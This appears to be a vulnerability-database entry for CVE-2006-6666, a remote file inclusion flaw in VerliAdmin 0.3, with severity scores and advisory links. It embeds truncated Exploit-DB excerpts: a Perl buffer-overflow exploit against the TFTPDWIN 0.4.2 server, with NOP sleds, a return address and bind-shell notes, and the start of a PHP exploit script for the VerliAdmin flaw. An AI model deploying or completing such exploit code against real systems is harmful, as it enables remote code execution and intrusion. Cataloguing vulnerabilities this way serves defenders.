CVE-2006-6666
published 2006-12-20CVE-2006-6666: PHP remote file inclusion vulnerability in index.php in VerliAdmin 0.3 and earlier allows remote authenticated users to execute arbitrary PHP code via a URL in…
PriorityP340high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.45%
82.4th percentile
PHP remote file inclusion vulnerability in index.php in VerliAdmin 0.3 and earlier allows remote authenticated users to execute arbitrary PHP code via a URL in the q parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| verliadmin | verliadmin | <= 0.3 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Remote Buffer Overflow (1)
exploitdb·2007-01-15
CVE-2006-4948 ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Remote Buffer Overflow (1)
ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Remote Buffer Overflow (1)
---
#!/usr/bin/perl -w
use IO::Socket;
if(!($ARGV[1]))
{
print "Usage: tftpdwin-0-4-2.pl \n\n";
exit;
}
$victim = IO::Socket::INET->new(Proto=>'udp',
PeerAddr=>$ARGV[0],
PeerPort=>$ARGV[1])
or die "Cannot connect to $ARGV[0] sulla porta $ARGV[1]";
my $nop0="\x90"x15;
#8BC3 MOV EAX,EBX
#66:05 1201 ADD AX,112
#50 PUSH EAX
#C3 RETN
my $asm="\x8b\xc3\x66\x05\x12\x01\x50\xc3";
my $nop="\x90"x57;
my $nop1="\x90"x7;
my $eip="\x42\xfb\x61\x40";# pop ebp,ret in tftpd.exe
#my $eip="B"x4;
#A binary translation of NGS Writing Small Shellcode by Dafydd Stuttard with only two little differences
#1)bind port, in this exploit is 4444 in the original shellcode was 6666
#2)4 bytes added to the shellcode in order not to see the win
Exploit-DB
VerliAdmin 0.3 - 'index.php' Remote File Inclusion
exploitdb·2006-12-18
CVE-2006-6666 VerliAdmin 0.3 - 'index.php' Remote File Inclusion
VerliAdmin 0.3 - 'index.php' Remote File Inclusion
---
DEVIL TEAM IRC: irc.milw0rm.com:6667 #devilteam http://www.rahim.webd.pl/
');
die;
}
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpackets($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (
No writeups or analysis indexed.
http://secunia.com/advisories/23418http://www.securityfocus.com/bid/21640http://www.vupen.com/english/advisories/2006/5059https://www.exploit-db.com/exploits/2944http://secunia.com/advisories/23418http://www.securityfocus.com/bid/21640http://www.vupen.com/english/advisories/2006/5059https://www.exploit-db.com/exploits/2944
2006-12-20
Published